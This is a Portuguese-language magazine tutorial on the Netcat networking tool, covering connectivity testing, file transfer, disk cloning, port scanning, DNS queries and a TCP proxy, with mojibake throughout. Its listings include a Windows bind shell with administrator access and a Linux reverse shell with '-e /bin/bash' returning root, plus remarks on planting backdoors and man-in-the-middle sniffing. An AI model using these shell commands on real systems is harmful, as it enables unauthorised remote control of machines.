Netcat: O canivete suíço TCP/IP - Revista Infra Magazine 8

Do que se trata o artigo:

De acordo com o r�pido crescimento pela demanda de servi�os de redes, infraestrutura e seguran�a, o profissional da �rea se v� em situa��es onde a necessidade de um r�pido troubleshooting de infraestrutura para solu��es de determinados problemas � extremamente imprescind�vel. Configurar servi�os de rede complexos apenas para simples testes de conectividade tomam um tempo precioso do analista. A alternativa � a utiliza��o de um software simples e completo a fim de dinamizar e acelerar os testes supracitados. Desta forma, este artigo tem por objetivo descrever as principais caracter�sticas do comando Netcat, fornecendo aos leitores os fundamentos te�ricos e pr�ticos desse software t�o �til atualmente.

Em que situa��o o tema � �til:

Os pontos destacados nesse artigo ser�o �teis para a compreens�o geral do funcionamento da ferramenta, bem como suas principais fun��es e sintaxe de comando. Os conceitos expostos tamb�m ser�o de profunda import�ncia no aprofundamento no conhecimento t�cnico dos protocolos da pilha TCP/IP visto serem extensamente utilizados pelo comando, bem como o aprofundamento t�cnico do tema para profissionais e usu�rios da �rea de infraestrutura de redes ou seguran�a da informa��o.

Netcat: O canivete su��o TCP/IP:

Neste artigo ser�o apresentadas as principais caracter�sticas do comando Netcat, seu funcionamento e mecanismos de teste que o tornam uma ferramenta t�o completa. Tamb�m ser�o apresentados exemplos pr�ticos de utiliza��o focados no dia a dia do administrador de redes e/ou especialista em seguran�a. Por fim, ser�o apresentados exemplos avan�ados aprofundando ainda mais sua utiliza��o.

Como Analistas de Seguran�a e Infraestrutura, constantemente precisamos executar testes de rede, muitas vezes tomando um tempo precioso, para validar simples regras de firewall e conectividade entre redes. A forma normal utilizada para tal opera��o subentende �subir� os servi�os necess�rios nos respectivos servidores. O problema � que, al�m de dispendiosa, h� uma complexidade desnecess�ria envolvida em configurar corretamente o servi�o, quando na verdade o que precisamos no momento � apenas um teste simples de conectividade. Uma ferramenta que pode auxiliar de forma simples e eficiente nessa tarefa di�ria � o Netcat.

O Netcat, criado em 2004 pelo desenvolvedor conhecido como Hobbit, � uma simples ferramenta de rede bastante �til e vers�til utilizada para ler e escrever dados atrav�s de redes utilizando a pilha de protocolos TCP/IP criando os mais variados servi�os, por motivos de testes de conectividade, seguran�a, entre outros. Foi desenvolvido para ser uma ferramenta de �back-end� confi�vel, que pode ser utilizada diretamente, na linha de comando, ou indiretamente, via scripts. O Netcat pode ser integrado a outros softwares e scripts para uma s�rie de tarefas de rede cuja utilidade e profundidade dependem apenas da imagina��o e conhecimento TCP/IP do usu�rio.

Ainda, o Netcat pode ser utilizado facilmente para uma s�rie de tarefas de manuten��o, desenvolvimento, levantamento e troubleshooting de rede, pois simula praticamente todo e qualquer tipo de conex�o existente, entre outras funcionalidades como:

� Conex�es de entrada e/ou sa�da, TCP ou UDP, com origem ou destino a qualquer porta;

� Checagem completa de DNS (forward/reverse) com mensagens de warning;

� Habilidade de utilizar qualquer porta local;

� Habilidade de utiliza��o de qualquer endere�o IP de rede localmente configurada;

� Scanning de portas serializado ou rand�mico;

� Suporte a �loose source-routing�;

� Pode ler argumentos de linha de comando na entrada padr�o (stdin);

� Suporte a slow-send mode, linha a linha a cada n segundos;

� Envio de dumps hexadecimais ou arquivos;

� Fun��es opcionais de resposta ao protocolo Telnet.

E o melhor de tudo, o Netcat � totalmente gratuito, distribu�do sob a licen�a GNU General Public License (GPL), podendo ser baixado para Linux, FreeBSD, NetBSD, SunOS/Solaris, Mac OS X, Windows, entre outros, no site oficial (http://netcat.sourceforge.net).

Atualmente, devido a sua grande import�ncia para administradores de rede e especialistas em seguran�a, principalmente para analistas especializados em testes de invas�o (Pentesters), o Netcat j� � dispon�vel por padr�o na grande maioria dos reposit�rios de softwares de sistemas Unix-like, o que evita o gasto de tempo com sua compila��o e/ou instala��o. Para os mais puristas, o Netcat tamb�m � dispon�vel em c�digo fonte para compila��o em sistemas mais espec�ficos.

Utiliza��o e sintaxe b�sica

O Netcat foi desenvolvido para ser de simples opera��o utilizando par�metros de passagem bem intuitivos. O Netcat n�o possui interface gr�fica auxiliar oficial, por n�o ser de uso comum. Existem algumas implementa��es de entusiastas da aplica��o, uma delas � o GtkNetCat com par�metros bem intuitivos. Sua sintaxe � bem simples e similar a praticamente todos os comandos Unix-like. O nome do comando que executa o Netcat � nc.

Observe o exemplo de sintaxe padr�o a seguir, retirado diretamente do help:

# nc [-options] <host> port[s] [ports]

Onde:

� nc: Nome do comando execut�vel em shell do Netcat;

� [-options]: Par�metros e op��es passadas ao comando, como listen, tcp, etc.;

� <host>: IP ou nome do host a ser conectado;

� port[s]: Porta TCP/UDP utilizada para o servi�o.

Cliente de Conex�o (Client Mode)

O primeiro exemplo apresentado neste artigo � a forma mais simples de utiliza��o do Netcat, como cliente de conex�o a outros servidores ou websites, evitando o famigerado e bem conhecido comando Telnet. Para utiliz�-lo dessa forma, basta especificar as op��es de host e porta utilizados:


  # nc www.kernel.org 80
  GET / HTTP/1.1

Da mesma forma que um navegador funciona acessando um website na Internet digitando-se www.kernel.org na barra de URL, utiliza-se o Netcat como cliente de conex�o TCP (substituindo o navegador web) na porta 80 (HTTP) do site www.kernel.org. Logo ap�s, passa-se como par�metro HTTP a tag �GET / HTTP/1.1� para executar um Banner Grabbing (captura de cabe�alho) no servidor web do site. Esse par�metro � passado ao website por qualquer navegador web (Firefox, IE, etc.), por�m o mesmo n�o � visualizado pelo usu�rio. Veja o resultado da execu��o do comando anterior na Listagem 1.

Listagem 1. Sa�da do comando nc www.kernel.org 80.


  HTTP/1.1 400 Bad Request
  Date: Sat, 07 Jul 2012 01:52:00 GMT
  Server: Apache/2.2.22 (Fedora)
  Content-Length: 226
  Connection: close
  Content-Type: text/html; charset=iso-8859-1
   
  <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  <html><head>
  <title>400 Bad Request</title>
  </head><body>
  <h1>Bad Request</h1>
  <p>Your browser sent a request that this server could not understand.<br />
  </p>
  </body></html>

Obviamente o exemplo da Listagem 1 pode ser estendido a qualquer protocolo orientado a conex�o (TCP), como servidores de e-mail (SMTP), servidores de arquivos (FTP, SAMBA), entre outros.

� importante destacar que, em se tratando de comandos tipicamente de sistemas Unix, pode-se utilizar pipes (�|�) ou comandos de redirecionamento (�>�, �>>�, �<�) para melhorar e/ou completar seu funcionamento. Deste modo, esse mesmo exemplo poderia ser executado criando-se um arquivo get.txt com o conte�do �GET / HTTP/1.1�, e passando diretamente seu conte�do ao Netcat na linha de comando:

# nc www.kernel.org 80 < get.txt

Outra forma de executar o mesmo comando seria enviar a sa�da do comando echo ou printf diretamente via pipe para o Netcat, da seguinte forma:

# printf �GET / HTTP/1.1\n\n� | nc www.kernel.org 80

Quando nenhuma op��o de protocolo a ser utilizado � especificada na linha de comando, o padr�o utilizado como cliente ou servidor � o TCP (orientado a conex�o), e pode ser tamb�m definido, embora n�o necess�rio, pela op��o �-t� ou �--tcp�. Havendo necessidade de utiliza��o do protocolo UDP (n�o orientado a conex�o), ele deve ser explicitamente especificado pela op��o �-u� ou �--udp�.

Um breve exemplo de uso do protocolo UDP no Netcat � a consulta de DNS, ao inv�s de usar os j� conhecidos dig, nslookup entre outros:


  # nc �u ns1.servidor.com 53

Modo Servidor (Listen Mode)

Muitas vezes o administrador de redes tem necessidade de testar a conectividade de servi�os atravessando as interfaces de um firewall, por�m configurar servi�os como DNS ou um Web Server apenas para testes pode tomar bastante tempo. O Netcat auxilia nessa tarefa com a capacidade de entrar em modo LISTEN (-l) em qualquer socket ou porta (-p) do sistema, conforme pode ser visto a seguir:

# nc �l �p 80

Dessa forma, acabou-se de executar o Netcat servindo conex�es (modo Listen) na porta 80 da mesma forma que um servidor web HTTP. � importante frisar que em sistemas Linux, apenas o usu�rio root pode iniciar servi�os abaixo da porta 1024. Caso um usu�rio normal tente execut�-lo nessas portas, receber� uma mensagem de erro como a seguir:


  felipe@bt:~$ nc -l -p 80
  Can't grab 0.0.0.0:80 with bind : Permission denied

Para conectar ao servi�o em LISTEN, basta utilizar um cliente de conex�o Telnet ou o pr�prio Netcat em client mode em outro terminal:

# nc 192.168.217.132 500

Um ponto muito interessante e importante para os exemplos a seguir � notar que, utilizando o Netcat em modo listen e conectando-se a ele via client mode, qualquer string digitada na entrada padr�o (stdin) do client mode, aparecer� na sa�da padr�o (stdout) do Netcat em Listen. Devido a esse comportamento, muitas vezes essa fun��o � conhecida como Chat Mode, o que tamb�m pode ser utilizado para transmiss�o de qualquer outro tipo de dados, como ser� abordado em seguida.

Transfer�ncia de arquivos

Uma vez que se conhece a utilidade do Netcat em Listen Mode, e tamb�m a fun��o dos comandos de Pipe e Redirecionamento, pode-se utiliz�-los em conjunto para a transfer�ncia de arquivos de diversas formas.

No exemplo, ser� transferido um arquivo qualquer, de nome get.txt, em texto claro do servidor para o servidor (cliente) que est� requisitando o mesmo, com o nome de get-cliente.txt utilizando comandos Linux e Pipe. A primeira etapa para verificar se a c�pia dos arquivos ser� �ntegra � checar, com o aux�lio do comando �md5sum�, o n�mero CRC do arquivo original e, ao final da c�pia, fazer o mesmo no arquivo destino. O checksum � um n�mero utilizado para checar a integridade de arquivos em backups ou c�pias. � retirado do arquivo a ser verificado por v�rios comandos (foi utilizado o �md5sum�), para compara��o entre as duas pontas (origem e destino) da c�pia. Caso o mesmo seja id�ntico, a c�pia ter� sido feita com sucesso.

Atrav�s da Listagem 2, pode-se notar que a transfer�ncia foi executada sem problemas, e o checksum dos arquivos get.txt (origem) e get-cliente.txt (destino) s�o exatamente iguais, indicando que a c�pia foi feita de forma �ntegra.

Listagem 2. Comandos para Transfer�ncia de Arquivos.


  M�quina 1 (servindo o arquivo)
  # md5sum get.txt
  43fe9d8de2392b2e3c0289173fed453e  get.txt
  # cat get.txt | nc �l �p 10000
   
  Maquina 2 (capturando o arquivo)
  # nc 192.168.217.132 10000 > get-cliente.txt
  # md5sum get.txt
  43fe9d8de2392b2e3c0289173fed453e  get-cliente.txt

Utilizando esse exemplo como base, pode-se dificultar um pouco transferindo o conte�do de um diret�rio, compactando-o na transfer�ncia, e descompactando-o no destino, conforme a Listagem 3.

Listagem 3. Transfer�ncia de arquivos com compacta��o.


  M�quina 1 (servindo o arquivo)
  # tar �cf - /home/teste/ | nc �l �p 10000
  Maquina 2 (capturando o arquivo)
  # nc 192.168.217.132 10000 > tar �xvzf -

Nesse exemplo, executou-se a c�pia do diret�rio /home/teste da M�quina 1 para a M�quina 2 utilizando compacta��o real-time na transfer�ncia atrav�s do comando �tar �cf -�.

No primeiro comando, foi compactado o diret�rio /home/teste e enviados seus dados para a sa�da padr�o com o comando �tar �cf - /home/teste/�.

O processo de compactar um arquivo no momento da c�pia serve como um tipo de compress�o de dados que ir� ajudar a customizar o tempo de transfer�ncia, que ser� reduzido, bem como a largura de banda necess�ria para tal opera��o.

Outro exemplo interessante � a possibilidade de clonagem de um hard disk de um servidor para outra via rede, como visto na Listagem 4.

Listagem 4. Clonagem de Disco via Rede.


  M�quina 1 (servindo o disco destino)
  # nc �l �p 3000 | bzip2 �d | dd of=/dev/sdb
  M�quina 2 (enviando os dados de disco)
  # bzip2 �c /dev/sda | nc 192.168.217.132 3000

Nesse exemplo, foi executado o Netcat em modo Listen na porta 3000 e redirecionada a sa�da para o comando bzip2 com a op��o -d, que compactar� o arquivo no destino (M�quina 1). Logo ap�s o mesmo ser� reenviado, com o aux�lio do Pipe, para o software dd, que escreve a sa�da (of=) bit a bit no disco /dev/sdb. Uma vez tendo o Netcat em Listen na M�quina 1, pode-se logar na M�quina 2 e iniciar o envio solicitando ao comando bzip2 para compactar o dispositivo /dev/sda atrav�s da op��o -c para a sa�da padr�o. Logo ap�s, envia-se a sa�da para o comando Netcat que conectar� a M�quina 1 na porta 3000.

Obviamente, a compacta��o pode ser executada com qualquer software de linha de comando, por�m foi utilizado o comando bzip2, diferente do primeiro exemplo, para visualizar a gama de op��es de comandos existentes.

Modo T�nel Seguro com SSH (Tunneling Mode)

Na transfer�ncia executada no exemplo da Listagem 4, foi feito com que os dados fossem transmitidos de um servidor a outro em texto claro, o que pode ser completamente inseguro devido � import�ncia e confidencialidade dos dados do arquivo. Com o comando SSH, pode-se criar um t�nel criptografado entre as duas pontas e assim transmitir o arquivo em texto claro de forma mais segura (ver Listagem 5).

Listagem 5. T�nel seguro de envio de arquivos com SSH.


  M�quina 1 (servindo o arquivo)
  # cat arquivo-origem.iso | nc �l �p 8888
  Maquina 2 (capturando o arquivo)
  # ssh �f �L 9999:localhost:8888 backup@192.168.217.132 sleep 1; nc localhost 9999 > arquivo-destino.iso

No exemplo da Listagem 5, o servidor, em Listen mode, abre o arquivo arquivo-origem.iso e o serve na porta 8888. No computador cliente, cria-se um t�nel SSH na porta 9999 em localhost (127.0.0.1) e o associa-se a porta 8888, acessada via SSH, com o usu�rio backup no servidor que est� servindo o arquivo original, 192.168.217.132. A conex�o ir� solicitar ao usu�rio backup a senha SSH para conex�o, e quando preenchida, iniciar� a c�pia para o arquivo arquivo-destino.iso.

Executando comandos em Modo Listen (Backdoor Mode)

O Netcat possui uma op��o, particularmente importante para especialistas em seguran�a e pentesting, para inclus�o de backdoors (falhas de seguran�a), que permite executar qualquer comando ou script remoto na m�quina que serve o socket, a op��o -e. Um breve exemplo executado em um servidor Windows, criando um shell remoto, pode ser visto na Listagem 6.

Listagem 6. Criando um Shell Windows Remoto.


  M�quina 1 (Windows)
  C:\nc11nt> netcat.exe �l �p 2000 �e cmd.exe -d
   
  Maquina 2 (Linux)
  # nc 192.168.217.2 2000
   
  Microsoft Windows [Version 6.1.7601]
  Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
   
  C:\nc11nt> dir
   dir
   Volume in drive C has no label.
   Volume Serial Number is AE7D-CB8E
   
   Directory of C:\nc11nt
   
  08/07/2012  17:01    <DIR>          .
  08/07/2012  17:01    <DIR>          ..
  28/11/1997  14:48            12.039 doexec.c
  09/07/1996  16:01             7.283 generic.h
  06/11/1996  22:40            22.784 getopt.c
  03/11/1994  19:07             4.765 getopt.h
  06/02/1998  15:50            61.780 hobbit.txt
  28/11/1997  14:36               544 makefile
  03/01/1998  14:37            59.392 nc.exe
  04/01/1998  15:17            69.081 NETCAT.C
  16/09/2009  14:39             7.070 readme.txt
                 9 File(s)        244.738 bytes
                 2 Dir(s)  111.135.408.128 bytes free
   
  C:\nc11nt> echo %USERDOMAIN%\%USERNAME%
  echo %USERDOMAIN%\%USERNAME%
  SERVER\Administrator

Nota-se que o servi�o foi iniciado na porta 2000 no servidor Windows, solicitando a execu��o do comando cmd.exe com a op��o �e. Uma vez conectados, verificando o banner do sistema, � recebido o Command Prompt (tela �C:\>�) e executa-se o comando dir. Observa-se que quando � utilizado o comando echo %USERDOMAIN%\%USERNAME%, recebe-se a resposta SERVER\Administrator, indicando que se est� conectado com permiss�es de administrador do sistema, j� que executou-se tamb�m o Netcat com permiss�es de super usu�rio. Tem-se agora, portanto, acesso irrestrito ao sistema.

Uma op��o muito importante usada em conjunto com -e � a op��o Stealth Mode -d. Ela faz com que o console seja desconectado do comando cmd.exe utilizado. Assim, pode-se executar o comando em background sem correr o risco de o servi�o cair quando da desconex�o do cliente. Essa op��o existe apenas em sistemas operacionais Microsoft Windows, uma vez que em sistemas Unix e Linux o caractere especial & j� faz o servi�o.

Os comandos da Listagem 6 podem ser facilmente alterados para servir backdoors como meio de entrada remota ao servidor, utilizando n�o necessariamente um Shell, por�m tamb�m outros comandos e scripts.

Criando um Shell Reverso

No exemplo da Listagem 6, foi aberto diretamente no servidor um shell para conex�o via cliente. No entanto, na maioria das vezes, o firewall n�o permite a abertura das portas utilizadas, ou de um shell local. Para tal situa��o, existe o recurso de abrir um shell reverso, onde o Listen � iniciado no servidor, por�m o shell � solicitado pela ponta que conecta, ou seja, o cliente. Para deixar o exemplo mais completo, o servidor em Listen ser� um Windows, e a m�quina cliente ser� um Linux. Veja este caso na Listagem 7.

Listagem 7. Criando um Shell Reverso.


  M�quina 1 (Windows)
  C:\nc11nt> nc.exe �nvl �p 2000
  Listening on [any] 2000 �
  M�quina 2 (Linux)
  # nc 192.168.217.2 2000 �e /bin/bash

Dessa forma cria-se um shell reverso remoto para o cliente. Portanto, basta executar qualquer comando no servidor, que o mesmo ser� executado na m�quina cliente, como mostrado na Listagem 8.

Listagem 8. Execu��o de comandos no Cliente.


  C:\nc11nt> nc.exe �nvl �p 2000
  Listening on [any] 2000 �
  Connect to [192.168.217.2] from <192.168.217.132> 52456
  whoami
  root
  pwd
  /root

Nota-se que no exemplo da Listagem 8 foram executados dois comandos. Respectivamente, �whoami� e �pwd�, que verificam com qual usu�rio est� logado e qual � o diret�rio corrente.

Criar um shell reverso tem diversas utilidades, como copiar comandos e/ou exploits (scripts que exploram falhas atrav�s de c�digo malicioso) para o servidor alvo, bem como executar rotinas e criar novos backdoors para posterior acesso ao servidor.

Scanner de Portas (Scanner Mode)

Embora n�o t�o completas como as do conhecido Nmap, o Netcat possui op��es para escanear portas de hosts de rede de forma serializada ou rand�mica, e com suporte a inclus�o de port range, como visto no exemplo da Listagem 9.

Listagem 9. Scaneamento de Portas.


  # nc �v �n �w 2 �r �z 192.168.217.2 100-500
  (UNKNOWN) [192.168.217.2] 445 (microsoft-ds) open
  (UNKNOWN) [192.168.217.2] 443 (https) open
  (UNKNOWN) [192.168.217.2] 139 (netbios-ssn) open
  (UNKNOWN) [192.168.217.2] 135 (loc-srv) open

Na Listagem 9, utilizou-se o Netcat para escanear (op��o �z) o servidor 192.168.217.2 especificando um range de portas (100-500) com o caractere �-� entre a porta in�cio e a porta fim. Tamb�m usou-se a op��o -n para evitar uma consulta de DNS reverso no IP alvo do scanner e a op��o -v (verbose) para adicionar mais detalhes � sa�da. A op��o �v (verbose mode) adiciona mais detalhes ao resultado do comando e pode ser utilizada at� duas vezes (�-vv�). Nota-se tamb�m que, dependendo da quantidade de portas configuradas no range, o tempo de escaneamento torna-se muito alto, motivo pelo qual utiliza-se a op��o -w 2, para permitir um timeout de dois segundos por porta, visando acelerar o processo. Outra funcionalidade importante para aumentar as chances de sucesso � randomizar o escaneamento de portas, empregando para isso a op��o -r.

A fun��o de scanning do Netcat exibe como sa�da apenas as portas em listen (abertas) do range utilizado, e n�o todas as escaneadas.

Caso seja necess�rio o scanning de poucas portas, elas podem ser definidas uma a uma separadas pelo delimitador espa�o, como demonstrado a seguir:

# nc �v �n �w 2 �r �z 192.168.217.2 443 445 500

Embora muito pouco frequente, ocasionalmente o host alvo pode estar negando a consulta de portas. Esse comportamento pode ser proveniente de algum problema na rede que n�o permita acessar remotamente as portas utilizadas na velocidade desejada. Isso pode gerar mensagens de erros diferentes como time out (ver Listagem 10).

Listagem 10. Mensagens de Time Out.


  # nc -v -w 2 -r -z www.google.com 22 23 24 25
  DNS fwd/rev mismatch: www.l.google.com != yx-in-f106.1e100.net
  DNS fwd/rev mismatch: www.l.google.com != yx-in-f147.1e100.net
  DNS fwd/rev mismatch: www.l.google.com != yx-in-f99.1e100.net
  DNS fwd/rev mismatch: www.l.google.com != yx-in-f104.1e100.net
  DNS fwd/rev mismatch: www.l.google.com != yx-in-f103.1e100.net
  DNS fwd/rev mismatch: www.l.google.com != yx-in-f105.1e100.net
  www.l.google.com [74.125.45.106] 22 (ssh) : Connection timed out
  www.l.google.com [74.125.45.106] 23 (telnet) : Connection timed out
  www.l.google.com [74.125.45.106] 24 (?) : Connection timed out
  www.l.google.com [74.125.45.106] 25 (smtp) : Connection timed out

Nota-se que, no exemplo da Listagem 10, foi retirada a op��o -n para visualizar a consulta reversa do servidor. Devido a isso, foi mostrado todos os registros reversos do FQDN (Fully Qualified Domain Name) consultados.

Executando DNS Queries

Utilizando a op��o �-u� para pacotes UDP pode-se simular uma consulta DNS (DNS Query) a um determinado servidor. Para isso, primeiramente precisa-se iniciar o Netcat em Listen Mode na porta 53/UDP. Em outro terminal, verifica-se como � constru�da a estrutura da string de DNS query, executando-a no servidor criado localmente na porta 53/UDP (Terminal 1 da Listagem 11) e enviando a sa�da da consulta para o arquivo dns-query.txt, como apresentado na Listagem 11.

Listagem 11. Simulando consultas DNS.


  Terminal 1
  # nc �u �i �p 53 > dns-query.txt
  Terminal 2 
  # dig www.website.com @localhost

Dentro do arquivo dns-query.txt estar� a consulta DNS da forma como a estrutura da query foi interpretada pelo Netcat. Agora precisa-se remeter o conte�do do arquivo para algum servidor DNS v�lido, com o objetivo de simular a consulta. Pode-se, portanto, reutilizar a resposta como uma query executada diretamente pelo Netcat no comando a seguir, onde, na sa�da padr�o, ser� exibido o conte�do da query executada:

# cat dns-query.txt | nc �u ns1.servidor.com 53

Servindo p�ginas web

Outro recurso do Netcat � servir p�ginas simples HTML (da mesma forma que um servidor web) para utiliza��o em testes ou at� mesmo em exploits. Para ilustrar um exemplo, foi criada uma pequena p�gina HTML de nome pagina.html com o conte�do da Listagem 12.

Listagem 12. C�digo HTML do arquivo pagina.html.


  <html>
        <title>Pagina de teste</title>
  <body>
  <h2>Alo Netcat</h2>
  <h2>Bem Vindo</h2>
  </body>
  </html>

Para evitar instalar e configurar um servidor web do zero, utiliza-se estruturas de la�o �while� em shell script, para evitar que a p�gina feche criando uma opera��o que nunca expira (�while true�). Logo ap�s, concatena-se a sa�da do arquivo pagina.html para o Netcat j� em Listen na porta 80/TCP, com o comando �nc -l -p 80 -q 1 < pagina.html�. Logo ap�s, fecha-se a condi��o �while� com o �done� da seguinte forma:

# while true; do nc -l -p 80 -q 1 < pagina.html ; done

Assim, acaba-se de criar um servidor na porta 80/TCP disponibilizando nele a p�gina pagina.html. Nota-se que o comando executado ficar� no terminal at� que seja finalizado com um ctrl+c.

Em seguida, abre-se outro terminal e checa-se com o comando �netstat �platun | grep 80�, se o comando foi executado e est� rodando com sucesso:


  # netstat -platun | grep 80
  tcp        0      0 0.0.0.0:80       0.0.0.0:*      LISTEN      7155/nc

A sa�da do comando �netstat� mostra que o comando Netcat foi executado com sucesso e est� respondendo na porta 80.

Uma vez que a p�gina esteja funcionando na porta escolhida, basta abrir o endere�o IP do servidor utilizado na barra de URL de qualquer browser da mesma forma que seria feito com uma p�gina normal (Figura 1).

Figura 1. Abrindo o arquivo pagina.html do servidor no navegador web.

Se retornar ao terminal que est� servindo a conex�o, observa-se a utiliza��o do browser Microsoft Internet Explorer 9.0, como mostra o banner de �User Agent� da Listagem 13.

Listagem 13. Banner �User Agent� do Navegador Web.


  # while true; do nc -l -p 80 -q 1 < pagina.html ; done
   
  GET / HTTP/1.1
  Accept: text/html, application/xhtml+xml, */*
  Accept-Language: pt-BR
  User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
  Accept-Encoding: gzip, deflate
  Host: 192.168.217.132
  Connection: Keep-Alive
   
  GET /favicon.ico HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
  Host: 192.168.217.132
  Connection: Keep-Alive

Definindo o IP de Origem

Em determinadas situa��es, onde o servidor possui diversos IPs configurados em uma ou mais interfaces de rede, � necess�rio definir um IP que se deseja utilizar no Netcat. Quando n�o � definido um IP de origem, o servi�o entrar� em Listen em todos os IPs dispon�veis no servidor, que no Shell Linux � referido pelo IP 0.0.0.0. Como pode ser visto na Listagem 14, executa-se o comando Netcat no Terminal 1 e o comando �netstat� no Terminal 2.

Listagem 14. Comando Netcat sem defini��o de IP espec�fico.


  Terminal 1
  # nc�l �p 12345
  Terminal 2
  # netstat -platun | grep 1234
  tcp        0      0   0.0.0.0:12345    0.0.0.0:*    LISTEN      2244/nc

Para evitar esse comportamento, pode-se utilizar a op��o -s para definir um IP de origem espec�fico onde o socket ficar� em Listen.

Utilizando o comando �ifconfig �a� | grep inet�, observa-se que o servidor possui dois IPs diferentes:


  # ifconfig -a | grep inet 
     inet addr:192.168.217.132  Bcast:192.168.217.255  Mask:255.255.255.0
     inet addr:192.168.217.135  Bcast:192.168.217.255  Mask:255.255.255.0

Ser� ent�o utilizado o Netcat executando dois servi�os em dois IPs diferentes. O primeiro servi�o ser� criado na porta 12345 no IP 192.168.217.132 e o segundo na porta 12346 no IP 192.168.217.135, executando cada comando em um terminal diferente, como na Listagem 15.

Listagem 15. Criando dois servi�os em portas e IPs diferentes.


  Terminal 1
  # nc �s 192.168.217.132 �l �p 12345
  Terminal 2
  # nc �s 192.168.217.2 12346 �l �p 12346

Em um terceiro terminal, utiliza-se o comando �netstat� e visualiza-se os dois IPs, cada um executando um dos servi�os supracitados, fornecendo o acesso �s portas apenas no IP especificado:


  # netstat -platun | grep 1234
  tcp        0  0 192.168.217.132:12345   0.0.0.0:*   LISTEN      2231/nc
  tcp        0  0 192.168.217.135:12346   0.0.0.0:*   LISTEN      2232/nc

Proxy TCP gen�rico

Existe uma funcionalidade muito conveniente do Netcat quando se utiliza o comando em conjunto com arquivos Linux do tipo pipe. Pode-se, por assim dizer, criar um sniffer como um �man-in-the-middle� para monitorar o tr�fego entre o cliente, que requisita o acesso, e o servidor na ponta final. Assim, pode-se levantar informa��es para executar atividades maliciosas ou simplesmente como forma de debug do tr�fego da rede.

Desse modo, consegue-se visualizar exatamente a sequ�ncia de caracteres retornada pelo servidor remoto e, consequentemente, monitorar o tr�fego de acesso a essa porta.

Para executar essa tarefa, precisa-se primeiramente criar um arquivo do tipo pipe, como a seguir:

# mknod backpipe p

Uma vez criado o pipe, utiliza-se o Netcat para criar um servidor na porta 80/TCP, setando tamb�m um outro Netcat (recebendo dados via pipe do comando anterior) para falar com o servidor real em sua porta original, que no exemplo � 81/TCP. Dessa forma, faz-se com que eles passem todos os dados que recebem de um para o outro, formando juntos um proxy, algo como um sniffer �man-in-the-middle� na conex�o, como no comando a seguir:

# nc �l �p 80 0<pipe-retorno | tee �a entrada | nc localhost 81 | tee �a saida 1>pipe-retorno

Devido ao fato de pipes do Bash Linux apenas transportarem dados unidirecionalmente, precisa-se de um meio de levar as respostas junto com os dados. Cria-se ent�o um pipe no sistema de arquivos local para carregar os dados de volta no sentido contr�rio.

Requisi��es destinadas ao proxy, chegando no primeiro comando Netcat, ficam em estado LISTEN na porta 80. Em seguida, estas requisi��es s�o reenviadas via pipe ao comando tee, que as loga no arquivo �entrada�. Logo ap�s a sa�da do comando, a requisi��o � enviada para o segundo comando Netcat, que conecta ao servidor web real. Quando a resposta retorna do servidor, chega diretamente ao segundo comando Netcat, e � escrita pelo segundo comando tee no arquivo �saida�. A mesma resposta do comando � replicada para o pipe �pipe-retorno� no sistema de arquivos local.

Devido � complexidade do comando, o mesmo pode ser mais bem analisado e entendido no diagrama de fluxo de dados da Figura 2.

Figura 2. Diagrama de fluxo do comando Netcat.

� primeira vista, essa opera��o pode parecer um pouco mais complicada do que o habitual. Portanto, reserve um tempo para entender a sintaxe, a fim de, com um pouco de criatividade, tamb�m poder utiliz�-la em seus scripts di�rios, caso necess�rio.

Conclus�o

O comando Netcat � bastante completo e flex�vel, sendo uma ferramenta chave para qualquer analista de TI, desde programadores a especialistas em seguran�a e redes. Pode ser facilmente utilizada na cria��o de programas para testes, troubleshooting de rede, exploits ou scripts, auxiliando em todas as fun��es di�rias de gerenciamento.

Existem diversos outros exemplos que podem ser visualizados no pr�prio pacote do Netcat, e assim como os citados neste artigo, servem de ponto de partida para seus pr�prios exemplos e scripts.

O �nico limite existente para transformar o Netcat em uma ferramenta completa e �til, cheia de funcionalidades, � a sua pr�pria criatividade e necessidade.

Embora o Netcat seja largamente utilizado pela sua gama de funcionalidades, existem alternativas mais atuais que aumentam ainda mais o seu poder e utilidade, suportando mais protocolos e fun��es, como o Ncat. Por�m, esse � um assunto para outro artigo.

Links

Site Oficial do Netcat
http://netcat.sourceforge.net/

Site Oficial do Netcat vers�o 1.10
http://nc110.sourceforge.net/

Livro �Netcat Power Tools�, escrito por Giovanni Giacobbi
www.adaptivepath.com/publications/essays/archives/000385.php

RFC 1035 Domain Names � Implementation and Specification
http://www.faqs.org/rfcs/rfc1035.html

Site do GtkNetCat
http://linux.softpedia.com/get/System/Networking/GtkNetCat-39311.shtml

Tecnologias:

Confira outros conte�dos:

Programa��o x Concurso P�blico

Osvaldo aprendeu programa��o

DevMedia x Netflix: Onde investir meu...

Assista grátis a nossa aula inaugural

Perguntas frequentes

Quem somos?

Por que a programação se tornou a profissão mais promissora da atualidade?

Como faço para começar a estudar?

Em quanto tempo de estudo vou me tornar um programador?

Sim, você pode se tornar um programador e não precisa ter diploma de curso superior!

O que eu irei aprender estudando pela DevMedia?

Principais diferenciais da DevMedia

Qual o investimento financeiro que preciso fazer para me tornar um programador?

Como funciona a forma de pagamento da DevMedia?

Por Felipe Em 2012

Nossos casos de sucesso

Leonardo Carlos

Eu sabia pouqu�ssimas coisas de programa��o antes de come�ar a estudar com voc�s, fui me especializando em v�rias �reas e ferramentas que tinham na plataforma, e com essa bagagem consegui um est�gio logo no in�cio do meu primeiro per�odo na faculdade.

Lucas Rodrigues

Estudo aqui na Dev desde o meio do ano passado! Nesse per�odo a Dev me ajudou a crescer muito aqui no trampo.
Fui o primeiro desenvolvedor contratado pela minha empresa. Hoje eu lidero um time de desenvolvimento!
Minha meta � continuar estudando e praticando para ser um Full-Stack Dev!

Her�clito J�nior

Economizei 3 meses para assinar a plataforma e sendo sincero valeu muito a pena, pois a plataforma � bem intuitiva e muuuuito did�tica a metodologia de ensino. Sinto que estou EVOLUINDO a cada dia. Muito obrigado!

Julio Cablen

Nossa! Plataforma maravilhosa. To amando o curso de desenvolvimento front-end, tinha coisas que eu ainda n�o tinha visto. A did�tica � do jeito que qualquer pessoa consegue aprender. S�rio, to apaixonado, adorando demais.

Joelberth Sena

